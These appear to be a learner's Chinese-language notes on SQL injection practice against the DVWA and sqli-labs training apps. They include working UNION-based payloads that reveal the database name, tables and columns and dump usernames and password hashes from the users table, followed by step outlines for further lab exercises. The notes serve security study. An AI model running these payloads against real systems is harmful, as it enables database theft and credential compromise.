sql注入练习
DVWA训练基础 low级别
1.参照上文确定当前库
1' union select (select database()),2 -- -
2.确定库后,爆表
1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -
3.确定表后,爆字段
1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -
4.确定字段后,进行拖库
1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -
以sqli-labs-master作为练习
第一步,使用拼接的方式决定注入类型 ( 第二题)
‘
第二部,使用order by确定有表单有几列值
order by根据指定的列对结果集进行排序
第三步,使用union select 来找到内容,获取想要得到内容
union select :联合查询
进阶,通过mysql注入获取表单内容,托库;
第一步:通过数据库语句进行搜索,首先确定数据库
第二部:确定数据库后,爆出它的表;
第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段
第四部:确定字段后,我们就可以拖库
(第一题)
寻找sql注入点(第三题)
判断显示位,经过排除发现他的显示位是3列
查询到数据库名,用户名
查询所有数据库名,表名
拖库
第四题
寻找sql注入点
判断显示位,经过排除发现他的显示位是3列
进行下一步操作,让他显示第二行数据
查询所有数据库名,表名